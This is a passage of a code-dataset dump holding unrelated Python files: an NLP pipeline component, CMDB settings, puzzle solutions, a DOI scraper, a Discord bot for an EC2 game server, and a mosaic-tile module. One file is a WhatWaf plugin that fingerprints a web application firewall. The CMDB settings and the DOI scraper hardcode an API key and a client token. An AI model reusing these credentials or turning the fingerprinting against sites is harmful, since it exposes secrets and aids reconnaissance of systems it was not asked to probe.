triplets\n\n\n@Language.factory(\n \"rebel\",\n requires=[\"doc.sents\"],\n assigns=[\"doc._.rel\"],\n default_config={\n \"model_name\": \"Babelscape/rebel-large\",\n \"device\": 0,\n },\n)\nclass RebelComponent:\n def __init__(\n self,\n nlp,\n name,\n model_name: str,\n device: int,\n ):\n assert model_name is not None, \"\"\n self.triplet_extractor = pipeline(\"text2text-generation\", model=model_name, tokenizer=model_name, device=device)\n # Register custom extension on the Doc\n if not Doc.has_extension(\"rel\"):\n Doc.set_extension(\"rel\", default={})\n\n def _generate_triplets(self, sent: Span) -> List[dict]:\n output_ids = self.triplet_extractor(sent.text, return_tensors=True, return_text=False)[0][\"generated_token_ids\"][\"output_ids\"]\n extracted_text = self.triplet_extractor.tokenizer.batch_decode(output_ids[0])\n extracted_triplets = extract_triplets(extracted_text[0])\n return extracted_triplets\n\n def set_annotations(self, doc: Doc, triplets: List[dict]):\n for triplet in triplets:\n # get substring to spacy span\n head_span = re.search(triplet[\"head\"], doc.text)\n tail_span = re.search(triplet[\"tail\"], doc.text)\n # get spacy span\n if head_span is not None:\n head_span = doc.char_span(head_span.start(), head_span.end())\n else:\n head_span = triplet[\"head\"]\n if tail_span is not None:\n tail_span = doc.char_span(tail_span.start(), tail_span.end())\n else:\n tail_span = triplet[\"tail\"]\n offset = (head_span.start, tail_span.start)\n if offset not in doc._.rel:\n doc._.rel[offset] = {\"relation\": triplet[\"type\"], \"head_span\": head_span, \"tail_span\": tail_span}\n\n def __call__(self, doc: Doc) -> Doc:\n for sent in doc.sents:\n sentence_triplets = self._generate_triplets(sent)\n self.set_annotations(doc, sentence_triplets)\n return doc\n","repo_name":"ShamblenEX/rebel","sub_path":"spacy_component.py","file_name":"spacy_component.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"15745618884","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\n\nBASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 用于API认证的KEY\nKEY = '299095cc-1330-11e5-b06a-a45e60bec08b'\n# 用于API认证的请求头\nAUTH_KEY_NAME = 'auth-key'\n\n# 错误日志\nERROR_LOG_FILE = os.path.join(BASEDIR, \"log\", 'error.log')\n# 运行日志\nRUN_LOG_FILE = os.path.join(BASEDIR, \"log\", 'run.log')\n\n# Agent模式保存服务器唯一ID的文件\nCERT_FILE_PATH = os.path.join(BASEDIR, 'config', 'cert')\n\n# 是否测试模式,测试模时候数据从files目录下读取\nTEST_MODE = True\n\n# 采集资产的方式,选项有:agent(默认), salt, ssh\nMODE = 'ssh'\n\n# 如果采用SSH方式,则需要配置SSH的KEY和USER\nSSH_PRIVATE_KEY = \"/home/auto/.ssh/id_rsa\"\nSSH_USER = \"root\"\nSSH_PORT = 22\n\n# 采集硬件数据的插件\nPLUGINS_DICT = {\n 'cpu': 'src.plugins.cpu.CpuPlugin',\n 'disk': 'src.plugins.disk.DiskPlugin',\n 'main_board': 'src.plugins.main_board.MainBoardPlugin',\n 'memory': 'src.plugins.memory.MemoryPlugin',\n 'nic': 'src.plugins.nic.NicPlugin',\n}\n\n# 资产信息API\nASSET_API = \"http://127.0.0.1:8000/api/asset\"\n\"\"\"\nPOST时,返回值:{'code': xx, 'message': 'xx'}\n code:\n - 1000 成功;\n - 1001 接口授权失败;\n - 1002 数据库中资产不存在\n\"\"\"","repo_name":"WuPeiqi/Trainning","sub_path":"cmdb/AutoClient/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"35810724392","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, 
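# Hedged usage sketch for the RebelComponent factory above. The pipeline
# name "rebel" and the config keys come from the @Language.factory decorator;
# the spaCy model and device index are assumptions (device=-1 selects CPU).
import spacy

nlp = spacy.load("en_core_web_sm")
nlp.add_pipe("rebel", config={"model_name": "Babelscape/rebel-large", "device": 0})
doc = nlp("Punta Cana is a resort town in the Dominican Republic.")
for offsets, triple in doc._.rel.items():
    print(offsets, triple["head_span"], triple["relation"], triple["tail_span"])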
right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def createBinaryTree(self, descriptions: [[int]]) -> [TreeNode]:\n node_dict = {}\n parent_dict = {}\n for p, c, l in descriptions:\n if p not in node_dict:\n p_node = TreeNode(p)\n node_dict[p] = p_node\n else:\n p_node = node_dict[p]\n if p not in parent_dict:\n parent_dict[p] = []\n if c not in parent_dict:\n parent_dict[c] = []\n if c not in node_dict:\n c_node = TreeNode(c)\n node_dict[c] = c_node\n else:\n c_node = node_dict[c]\n if l == 1:\n p_node.left = c_node\n else:\n p_node.right = c_node\n parent_dict[c].append(p)\n for k, v in parent_dict.items():\n if not v:\n return node_dict[k]\n","repo_name":"qq544259335/leetcode","sub_path":"LeetCodeWeekly/20220305-2/6018. Create Binary Tree From Descriptions.py","file_name":"6018. Create Binary Tree From Descriptions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13251518040","text":"\"\"\"This class helps to handle the data.\n\n\"\"\"\n\nimport logging\nimport tensorflow.compat.v1 as tf\nimport numpy as np\nfrom math import pi, cos, sin\n\nimport configs\n\nimport pdb\n\n\n# def _data_generator(dataset_config):\ndef _data_generator(dataset_size, dataset, anomalous):\n # dataset_size = dataset_config[0]\n # dataset = dataset_config[1]\n # generate dataset\n n = 0\n while n 5:\n raise ValueError(\"At least 5 sports\")\n\n profile = {\"name\": name, \"age\": age}\n\n if sports:\n profile[\"sports\"] = sorted(sports)\n\n if awards:\n profile[\"awards\"] = awards\n\n return profile\n","repo_name":"alehpineda/bitesofpy","sub_path":"36/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19332967823","text":"from habanero import Crossref\nfrom habanero import cn\nfrom difflib import SequenceMatcher\nimport pybtex.database as db\nimport re\nimport csv\nimport yaml\nimport json\nimport urllib\n\ndef similar(a, b):\n return SequenceMatcher(None, a,b).ratio()\n\ncr = Crossref()\n\ndef getCrossRefBibData(doi_text):\n try:\n art_bib = json.loads(cn.content_negotiation(ids = doi_text, format = \"citeproc-json\"))\n return art_bib\n except:\n return {}\n\ndef jsonToPlainText(element):\n if isinstance(element, int) or \\\n isinstance(element, float) or \\\n isinstance(element, str):\n return element\n elif 'date-parts' in element:\n return element['date-parts'][0]\n elif 'issue' in element:\n return element['issue']\n elif isinstance(element, list) \\\n and len(element) > 0 and 'URL' in element[0]:\n return element[0]['URL']\n\ndef findURIFrag(uri, referents, contains):\n result = \"\"\n try:\n req = urllib.request.Request(uri)\n req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')\n req.add_header('CR-Clickthrough-Client-Token', '0ed86a82-c7d263a1-3015720c-a52a5080')\n article_page = urllib.request.urlopen(req)\n page_text = article_page.read()\n except Exception as e:\n page_text=\"\"\n print(e)\n for token in referents:\n start = str(page_text).lower().find(token.lower())\n if start > 0:\n end = start + 800\n result = str(page_text)[start:end]\n referred = result.lower().find(contains)\n if not referred > 0:\n result = \"not found in ack\"\n break\n return result\n \n# open articles csv file\ncatalysis_articles = 
{}\nfieldnames=[]\ninput_file = 'ukch_pop_1refv.csv'\noutput_file = 'ukch_pop_1refv2.csv'\nwith open(input_file, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n if fieldnames==[]:\n fieldnames=list(row.keys())\n if row['Include'] =='':\n print(\"Adding\", row['Title'], row['DOI'])\n catalysis_articles[int(row['Num'])]=row\n \nfor cat_art_num in catalysis_articles.keys():\n if catalysis_articles[cat_art_num]['DOI'] != \"\":\n article_title = catalysis_articles[cat_art_num]['Title']\n doi_text = catalysis_articles[cat_art_num]['DOI']\n article_data = getCrossRefBibData(doi_text)\n if 'link' in article_data.keys():\n url = jsonToPlainText(article_data['link'])\n txt=findURIFrag(url,[\"acknowle\"],\"catalysis\")\n print(cat_art_num,\"|\",url,\"|\", txt)\n break\n \n\n\n","repo_name":"scman1/validatearticledata","sub_path":"scripts/findCHRefCRDOI.py","file_name":"findCHRefCRDOI.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70541913899","text":"import re\n\n\n__product__ = \"Chuangyu top government cloud defense platform (WAF)\"\n\n\ndef detect(content, **kwargs):\n content = str(content)\n detection_schema = (\n re.compile(r\"(http(s)?.//(www.)?)?365cyd.(com|net)\", re.I),\n )\n for detection in detection_schema:\n if detection.search(content) is not None:\n return True\n","repo_name":"Ekultek/WhatWaf","sub_path":"content/plugins/chuangyu.py","file_name":"chuangyu.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2401,"dataset":"github-code","pt":"92"} +{"seq_id":"8123178471","text":"from ast import Try\nimport asyncio\nfrom secrets import choice\nfrom typing import Optional\nfrom webbrowser import get\nimport discord\nimport requests\nfrom discord import app_commands\nfrom discord.app_commands import Choice\nfrom discord.ui import View, Button\nfrom rcon.source import Client, rcon\nfrom discord.ext import tasks\nimport os\nfrom dotenv import load_dotenv \n\nimport ec2_control\n\nMY_GUILD = discord.Object(id=1021758457818394664) # replace with your guild id\n\nload_dotenv()\nTOKEN = os.getenv('TOKEN')\nPASS = os.getenv('PASS')\nIP = os.getenv('IP')\n\nclass MyClient(discord.Client):\n def __init__(self, *, intents: discord.Intents):\n super().__init__(intents=intents)\n # A CommandTree is a special type that holds all the application command\n # state required to make it work. 
This is a separate class because it\n # allows all the extra state to be opt-in.\n # Whenever you want to work with application commands, your tree is used\n # to store and work with them.\n # Note: When using commands.Bot instead of discord.Client, the bot will\n # maintain its own tree instead.\n self.tree = app_commands.CommandTree(self)\n\n # In this basic example, we just synchronize the app commands to one guild.\n # Instead of specifying a guild to every command, we copy over our global commands instead.\n # By doing so, we don't have to wait up to an hour until they are shown to the end-user.\n async def setup_hook(self):\n # This copies the global commands over to your guild.\n self.tree.copy_global_to(guild=MY_GUILD)\n await self.tree.sync(guild=MY_GUILD)\n\n\nintents = discord.Intents.default()\nclient = MyClient(intents=intents)\n\ngreentick = \"<:greentick:1023396034363281428>\"\nredx = \"<:redx:1023396035625758770>\"\n\n@client.event\nasync def on_ready():\n update_channel.start()\n print(f'Logged in as {client.user} (ID: {client.user.id})')\n print('------')\n\n# start command\n@client.tree.command(name='start', description='Startuje serwer, wymaga specjalnej roli.')\nasync def start(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n # ROLE CHECK\n if discord.utils.get(interaction.user.roles, id=1021759370205339669) is None:\n embedVar = discord.Embed(title=\"Błąd\", description=f\"{redx} Nie masz prawidłowych roli, aby użyć tej komendy!\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n if ec2_control.instance_status(\"i-0f5911636a9843859\") == 'running':\n embedVar = discord.Embed(title=f\"{greentick} Serwer już chodzi\", description=f\"{redx} Serwer już chodzi! Spróbuj dołączyć, a jeśli są problemy to wyłącz i włącz serwer.\", color=0x00ff00)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n try:\n ec2_control.start_instance('i-0f5911636a9843859')\n except Exception as e:\n embedVar = discord.Embed(title=f\"{redx} Błąd\", description=f\"{redx} Wystąpił błąd podczas uruchamiania serwera. Spróbuj ponownie później.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n print(f\"ERROR: {e}\")\n return\n embedVar = discord.Embed(title=f\"{greentick} Włączono Serwer\", description=\"Maszyna startowała. Proszę parę minut poczekać zanim się serwer ARK uruchomi. 
Możesz sprawdzić czy jest uruchomiony za pomocą `/status`.\", color=0x00ff00)\n    # create a button that does /server status\n    await interaction.response.send_message(embed=embedVar)\n    print(f'{interaction.user} uruchomił serwer!')\n\n# stop command\n@client.tree.command(name='stop', description='Wyłącza serwer, wymaga specjalnej roli.')\nasync def stop(interaction: discord.Interaction):\n    # CHANNEL CHECK\n    if interaction.channel.id != 1024078298147471443:\n        await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n        return\n\n    # ROLE CHECK\n    if discord.utils.get(interaction.user.roles, id=1021759370205339669) is None:\n        embedVar = discord.Embed(title=\"Error\", description=f\"{redx} Nie masz prawidłowych roli, aby użyć tej komendy!\", color=0xff0000)\n        await interaction.response.send_message(embed=embedVar, ephemeral=True)\n        return\n\n    # STOPPED CHECK\n    if ec2_control.instance_status('i-0f5911636a9843859') == 'stopped':\n        embedVar = discord.Embed(title=f\"{redx} Serwer już jest wyłączony!\", description=\"Serwer już jest wyłączony! Jeśli chcesz zagrać na nim to włącz serwer za pomocą `/start`.\", color=0xff0000)\n        await interaction.response.send_message(embed=embedVar, ephemeral=True)\n        return\n\n    # PLAYER CHECK\n    players = await rcon(\n        'ListPlayers',\n        host=IP, port=27020, passwd=PASS\n    )\n    # if no players are online, the response starts with the letter N\n    if players[0] == 'N':\n        playercount = '0'\n    else:\n        players = players.split('\\n')\n        players = players[:-1]\n        playercount = len(players)\n    if playercount != '0':\n        embedVar = discord.Embed(title=f\"{redx} Błąd\", description=f\"{redx} Na serwerze jest {playercount} graczy. Wyłącz serwer, gdy wszyscy gracze opuszczą serwer.\", color=0xff0000)\n        await interaction.response.send_message(embed=embedVar, ephemeral=True)\n        return  # do not stop the server while players are still online\n\n    ec2_control.stop_instance('i-0f5911636a9843859')\n    embedVar = discord.Embed(title=f\"{redx} Serwer Zatrzymany\", description=\"Maszyna została zatrzymana. Serwer ARK powinien się zapisać i wyłączyć. 
Możesz go ponownie uruchomić za pomocą `/start`.\", color=0xff0000)\n    await interaction.response.send_message(embed=embedVar)\n    print(f'{interaction.user} zatrzymał serwer!')\n\n# status command\n@client.tree.command(name='status', description='Sprawdza status serwera.')\nasync def status(interaction: discord.Interaction):\n    # CHANNEL CHECK\n    if interaction.channel.id != 1024078298147471443:\n        await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n        return\n\n    awsserver = ec2_control.instance_status(\"i-0f5911636a9843859\")\n    if awsserver == 'running':\n        awsserver = f'{greentick} Online'\n    elif awsserver == 'stopped':\n        awsserver = f'{redx} Offline'\n    elif awsserver == 'pending':\n        awsserver = '⏳ Uruchamianie'\n    elif awsserver in ('shutting-down', 'stopping'):\n        awsserver = '⏳ Zatrzymywanie'\n    else:\n        print(f'Nieznany status: {awsserver}')\n        awsserver = '❓ Nieznany'\n    r = requests.get(f'http://api.steampowered.com/ISteamApps/GetServersAtAddress/v0001?addr={IP}:27015&format=json')\n\n    # IF THE SERVER IS OFFLINE\n    if r.json()['response']['servers'] == []:\n        arkserver = f'{redx} Offline'\n        playercount = '❓ Offline'\n\n    # IF THE SERVER IS ONLINE\n    elif r.json()['response']['servers'][0]['gamedir'] == 'ark_survival_evolved':\n        arkserver = f'{greentick} Online'\n        players = await rcon(\n            'ListPlayers',\n            host=IP, port=27020, passwd=PASS\n        )\n        # if no players are online, the response starts with the letter N\n        if players[0] == 'N':\n            playercount = '0'\n        else:\n            players = players.split('\\n')\n            players = players[:-1]\n            playercount = len(players)\n\n    # IF SOMETHING UNEXPECTED HAPPENED\n    else:\n        arkserver = '❓ Error'\n        playercount = '❓ Error'\n\n    embedVar = discord.Embed(title=\"📊 Status Serwera\", description=\"Status maszyny oraz serwera ARK.\", color=0x053552)\n    embedVar.add_field(name=\"Maszyna\", value=awsserver, inline=False)\n    embedVar.add_field(name=\"Serwer ARK\", value=arkserver, inline=False)\n    if playercount != '❓ Offline':\n        embedVar.add_field(name=\"Gracze\", value=f\"{playercount}\", inline=False)\n    await interaction.response.send_message(embed=embedVar, ephemeral=True)\n    return\n\n# IP command\n@client.tree.command(name='ip', description='Pokazuje IP serwera.')\nasync def ip(interaction: discord.Interaction):\n    # CHANNEL CHECK\n    if interaction.channel.id != 1024078298147471443:\n        await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n        return\n\n    ip = ec2_control.get_elastic_ip('i-0f5911636a9843859')\n    embedVar = discord.Embed(title=\"🌐 IP Serwera\", description=\"Jeśli chcesz połączyć się bezpośrednio do serwera (za pomocą server list w steamie) to połącz się do tego IP\", color=0xFFD0A0)\n    embedVar.add_field(name=\"IP\", value=f\"`{ip}`\", inline=True)\n    embedVar.add_field(name=\"Port\", value=\"`27015`\", inline=True)\n    await interaction.response.send_message(embed=embedVar, ephemeral=True)\n    return\n\n@client.tree.command(name='forcestop', description='Wymusza zatrzymanie serwera.')\nasync def forcestop(interaction: discord.Interaction):\n    # CHANNEL CHECK\n    if interaction.channel.id != 1024078298147471443:\n        await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n        return\n\n    # ADMIN CHECK\n    if discord.utils.get(interaction.user.roles, id=1022625217656410152) is None:\n        await interaction.response.send_message('❌ Nie jesteś administratorem!', ephemeral=True)\n        return\n\n    # STOPPED CHECK\n
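    # NOTE (added comment): ec2_control.instance_status is assumed to return the raw EC2 state string ('running', 'stopped', 'stopping', ...), hence the comparison below.\n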
    if ec2_control.instance_status('i-0f5911636a9843859') == 'stopped':\n        embedVar = discord.Embed(title=f\"{redx} Serwer już jest wyłączony!\", description=\"Serwer już jest wyłączony! Jeśli chcesz zagrać na nim to włącz serwer za pomocą `/start`.\", color=0xff0000)\n        await interaction.response.send_message(embed=embedVar, ephemeral=True)\n        return\n\n    ec2_control.stop_instance('i-0f5911636a9843859')\n    embedVar = discord.Embed(title=f\"{redx} Serwer Zatrzymany\", description=\"Maszyna została przymusowo zatrzymana. Serwer ARK powinien się zapisać i wyłączyć. Możesz go ponownie uruchomić za pomocą `/start`.\", color=0xff0000)\n    await interaction.response.send_message(embed=embedVar)\n    print(f'{interaction.user} przymusowo zatrzymał serwer!')\n\n# Update channel status name every 5 minutes\n@tasks.loop(minutes=5)\nasync def update_channel():\n    r = requests.get(f'http://api.steampowered.com/ISteamApps/GetServersAtAddress/v0001?addr={IP}:27015&format=json')\n    # If there is no data in server list, the server is offline\n    if r.json()['response']['servers'] == []:\n        status = 'OFFLINE'\n        playercount = 'OFFLINE'\n    elif r.json()['response']['servers'][0]['gamedir'] == 'ark_survival_evolved':\n        status = 'ONLINE'\n        players = await rcon(\n            'ListPlayers',\n            host=IP, port=27020, passwd=PASS\n        )\n        # if no players are online, the response starts with the letter N\n        if players[0] == 'N':\n            playercount = '0'\n        else:\n            players = players.split('\\n')\n            players = players[:-1]\n            playercount = len(players)\n\n    else:\n        status = 'ERROR'\n        playercount = 'OFFLINE'  # avoid a NameError in the channel rename below\n\n    channel = client.get_channel(1024317636697395241)\n    if playercount == 'OFFLINE':\n        await channel.edit(name=f'🔴 {status}')\n    else:\n        await channel.edit(name=f'🟢 {status} ({playercount})')\n\n# Delete messages in command only channel\n@client.event\nasync def on_message(message):\n    if message.author == client.user:\n        return\n    if message.channel.id == 1024078298147471443:\n        await message.delete()\n\nclient.run(TOKEN)","repo_name":"DuckyBlender/arkbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"197806324","text":"# Find the shortest distance between 2 given keys in a list.\n# suppose all keys >=0\n# Solution 1: Brute force O(M*N)\n# Solution 2: 2 pointer (sliding) O(M+N)\n# \n# # \n\n\nimport sys\n\nL=[3, 165, 90, 1, 88, 72, 33, 49, 3, 88, 111, 90]\nD=dict()\n\ndef solution(L, x, y):\n    # build dict \n    for i in range(len(L)):\n        k = L[i]\n        if k in D:\n            D[k].append(i)\n        else:\n            D[k] = [i]\n    #gap = getDistance(D, x, y)\n    gap = getDistance2(D, x, y)\n    print('-'*80)\n    print(gap)\n\n\n# brute force\ndef getDistance(d, a,b):\n    if a not in d:\n        return None\n    if b not in d:\n        return None\n    \n    gap = None\n    for i in d[a]:\n        for j in d[b]:\n            g = abs(i-j)\n            if not gap or g < gap:\n                gap = g\n    return gap\n\n# 'Slide and compare' (2 pointers)\n#     <-list1 \n#     list2->\ndef getDistance2(d, a,b):\n    d1 = d[a]; \n    # # d1.sort()    # no need sort, the indexes are already in order due to the way we create the dict list\n    d2 = d[b]; \n    # d2.sort()    # no need sort\n\n    i = 0\n    j = len(d2)-1\n    mingap = sys.maxsize\n    pregap = None\n    flag = True\n    # scan d1 forward and d2 backward, moving one pointer per step\n    while i < len(d1) and j >= 0:\n        gap = abs(d1[i] - d2[j])\n        if gap < mingap:\n            mingap = gap\n        if flag:\n            i += 1\n            flag = False\n        else:\n            j -= 1\n            flag = True\n        print(pregap, gap, mingap)\n        if pregap:\n            if gap > pregap:\n                break\n        pregap = gap\n    return mingap\n\n\nif __name__ == \"__main__\":\n    solution(L, 3, 88)\n    solution(L, 90, 
88)\n\n","repo_name":"icoding2016/study","sub_path":"PY/free_exercise/min_gap_in_array.py","file_name":"min_gap_in_array.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"1092938715","text":"import time\nimport random\nfrom typing import List\nimport logging\nimport numpy as np\nfrom shapely.geometry import LineString, Polygon, MultiPoint\nfrom shapely.validation import make_valid\nfrom shapely import affinity\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\n\nlogger = logging.getLogger(\"__main__.\" + __name__)\n\nRAND_SIZE = 0.15 # portion of tile size which is added or removed randomly during construction\nMAX_ANGLE = 40 # 30...75 => max construction angle for tiles along roundings\n\n\nclass MosaicTiles:\n def __init__(self, config_parameters):\n self.config = config_parameters\n self.tile_size = config_parameters.tile_size\n self.tile_area = (self.tile_size) ** 2\n self.half_tile_size = self.tile_size // 2\n self.tile_size_tolerance = int(self.tile_size * RAND_SIZE)\n self.mosaic_height = 0\n self.mosaic_width = 0\n\n def place_tiles_along_guides(self, chains: List, angles: np.array, polygons: List = None) -> List:\n \"\"\"Creates polygons (tiles) along guides\n\n Parameters\n ----------\n chains : List\n List of guides containing the chains along which the tiles need to be placed.\n angles : np.array\n Numpy array of shape (height, width) containing the angles of the guidelines.\n polygons : List, optional\n List of existing polygons (default is None).\n\n Returns\n -------\n List\n List containing all the polygon objects that represent the tiles of a mosaic\n \"\"\"\n logger.info(f\"Placing tiles along {len(chains)} guidelines\")\n if polygons is None:\n polygons = []\n for chain in tqdm(chains):\n\n # consider existing polygons next to the new lane (reason: speed)\n search_area = LineString(np.array(chain)[:, ::-1]).buffer(2.1 * self.half_tile_size)\n preselected_nearby_polygons = [poly for poly in polygons if poly.intersects(search_area)]\n\n polygons = self.estimate_polygons_from_chain(chain, angles, polygons, preselected_nearby_polygons)\n\n return polygons\n\n def estimate_polygons_from_chain(\n self, list_of_points: List, angles: np.array, polygons: List, preselected_nearby_polygons: List\n ) -> List:\n \"\"\"Creates a list of polygons by iterating along the points of a chain\n\n Parameters\n ----------\n list_of_points : List\n List of points that create a chain.\n angles : np.array\n Numpy array of shape (height, width) containing the angles of the points.\n polygons : List\n List of existing polygons\n preselected_nearby_polygons : List\n List of polygons that are close to the point\n\n Returns\n -------\n List\n List containing the polygon objects for a chain\n \"\"\"\n for point_idx, point in enumerate(list_of_points):\n y_coord, x_coord = point\n angle = angles[y_coord, x_coord]\n\n if point_idx == 0: # at the beginning save the first side of the future polygon\n random_tile_size = self.tile_size + (self.tile_size_tolerance * random.choice([-1, 1]))\n point_idx_start = point_idx\n point_angle_start = angle\n line_start = self._get_line_from_coords(x_coord, y_coord, point_angle_start)\n\n chain_ready = self._check_if_chain_ready_for_polygon(\n point_idx, point_idx_start, list_of_points, point_angle_start, angles, random_tile_size\n )\n\n if chain_ready:\n line = self._get_line_from_coords(x_coord, y_coord, angle)\n\n polygons, 
preselected_nearby_polygons = self._add_polygon(\n                    line_start, line, polygons, preselected_nearby_polygons\n                )\n\n                line_start = line\n                point_angle_start = angle\n                point_idx_start = point_idx\n\n        return polygons\n\n    def _get_line_from_coords(self, x_coord: int, y_coord: int, angle: float):\n\n        line = LineString([(x_coord, y_coord - self.half_tile_size), (x_coord, y_coord + self.half_tile_size)])\n        line = affinity.rotate(line, -angle)\n\n        return line\n\n    @staticmethod\n    def _check_if_chain_ready_for_polygon(\n        point_idx: int,\n        point_idx_start: int,\n        chains: List,\n        point_angle_start: float,\n        angles: np.array,\n        random_tile_size: int,\n    ):\n        # 1. end of point is reached\n        if point_idx == len(chains) - 1:\n            return True\n        else:\n            y_next, x_next = chains[point_idx + 1]\n            angle_next_point = angles[y_next, x_next]\n            angle_delta = angle_next_point - point_angle_start\n            angle_delta = min(180 - abs(angle_delta), abs(angle_delta))\n            # 2. with the NEXT point a large angle would be reached => draw now\n            if angle_delta > MAX_ANGLE:\n                return True\n            # 3. goal width is reached\n            if point_idx - point_idx_start == random_tile_size:\n                return True\n        return False\n\n    def _add_polygon(\n        self,\n        line_start: LineString,\n        current_line: LineString,\n        polygons: List,\n        preselected_nearby_polygons: List,\n    ):\n\n        # construct new tile\n        polygon = MultiPoint(\n            [line_start.coords[0], line_start.coords[1], current_line.coords[0], current_line.coords[1]]\n        ).convex_hull\n\n        # cut off areas that overlap with already existing tiles\n        nearby_polygons = [\n            poly for poly in preselected_nearby_polygons if polygon.buffer(0.02).disjoint(poly.buffer(0.02)) is False\n        ]\n        polygon = self._fit_in_polygon(polygon, nearby_polygons)\n\n        # Sort out small tiles\n        if polygon.area >= 0.08 * self.tile_area and polygon.geom_type == \"Polygon\" and polygon.is_valid:\n            polygons += [polygon]\n            preselected_nearby_polygons += [polygon]\n            # self.plot_polygons(polygons)\n\n        return polygons, preselected_nearby_polygons\n\n    def _fit_in_polygon(self, polygon: Polygon, nearby_polygons: List):\n        # Remove parts from polygon which overlap with existing ones:\n        for p_there in nearby_polygons:\n            polygon = polygon.difference(p_there)\n        # only keep largest part if polygon consists of multiple fragments:\n        if polygon.geom_type == \"MultiPolygon\":\n            i_largest = np.argmax([p_i.area for p_i in polygon.geoms])\n            polygon = polygon.geoms[i_largest]\n        # remove pathologic polygons with holes (rare event):\n        if polygon.geom_type not in [\"MultiLineString\", \"LineString\", \"GeometryCollection\"]:\n            if polygon.interiors:  # check for attribute interiors if accessible\n                polygon = Polygon(list(polygon.exterior.coords))\n\n        return polygon\n\n    def postprocess_polygons(self, polygons):\n\n        logger.info(\"Postprocessing mosaic\")\n        # complete_polygons = self.cut_tiles_outside_frame(polygons)\n        shrinked_polygons = self._irregular_shrink(polygons)\n        repaired_polygons = self._repair_tiles(shrinked_polygons)\n        reduced_polygons = self._reduce_edge_count(repaired_polygons)\n        polygons = self._drop_small_tiles(reduced_polygons)\n\n        return polygons\n\n    def _irregular_shrink(self, polygons):\n        polygons_shrinked = []\n        for polygon in polygons:\n            polygon = affinity.scale(polygon, xfact=random.uniform(0.85, 1), yfact=random.uniform(0.85, 1))\n            polygon = polygon.buffer(-0.03 * self.half_tile_size)\n            polygons_shrinked += [polygon]\n\n        return polygons_shrinked\n\n    def _repair_tiles(self, polygons):\n        # remove or correct strange polygons\n        polygons_new = []\n        for polygon in polygons:\n
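            # NOTE (added comment): shapely's difference() can split a tile into a MultiPolygon; each fragment is kept as a separate tile below.\n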
            if polygon.geom_type == \"MultiPolygon\":\n                for polygon_repaired in polygon.geoms:\n                    polygons_new += [polygon_repaired]\n            else:\n                polygons_new += [polygon]\n\n        polygons_new2 = []\n        for polygon in polygons_new:\n            if polygon.exterior.geom_type == \"LinearRing\":\n                polygons_new2 += [polygon]\n\n        return polygons_new2\n\n    def _reduce_edge_count(self, polygons, tol=20):\n        polygons_new = []\n        for polygon in polygons:\n            polygon = polygon.simplify(tolerance=self.half_tile_size / tol)\n            polygons_new += [polygon]\n        return polygons_new\n\n    def _drop_small_tiles(self, polygons, threshold=0.03):\n        polygons_new = []\n        counter = 0\n        for polygon in polygons:\n            if polygon.area > threshold * self.tile_area:\n                polygons_new += [polygon]\n            else:\n                counter += 1\n        return polygons_new\n\n    def cut_tiles_outside_frame(self, polygons):\n        # remove parts of tiles which are outside of the actual image\n        t_0 = time.time()\n        outer = Polygon(\n            [\n                (-3 * self.half_tile_size, -3 * self.half_tile_size),\n                (self.mosaic_width + 3 * self.half_tile_size, -3 * self.half_tile_size),\n                (self.mosaic_width + 3 * self.half_tile_size, self.mosaic_height + 3 * self.half_tile_size),\n                (-3 * self.half_tile_size, self.mosaic_height + 3 * self.half_tile_size),\n            ],\n            holes=[\n                [\n                    (1, 1),\n                    (self.mosaic_height - 1, 1),\n                    (self.mosaic_height - 1, self.mosaic_width - 1),\n                    (1, self.mosaic_width - 1),\n                ],\n            ],\n        )\n        polygons_cut = []\n        counter = 0\n        for polygon in polygons:\n            x_coord, y_coord = list(polygon.representative_point().coords)[0]\n            if (\n                y_coord < 4 * self.half_tile_size\n                or y_coord > self.mosaic_height - 4 * self.half_tile_size\n                or x_coord < 4 * self.half_tile_size\n                or x_coord > self.mosaic_width - 4 * self.half_tile_size\n            ):\n                polygon = make_valid(polygon).difference(make_valid(outer))  # => if outside image borders\n                counter += 1\n            if polygon.area >= 0.05 * self.tile_area and polygon.geom_type == \"Polygon\":\n                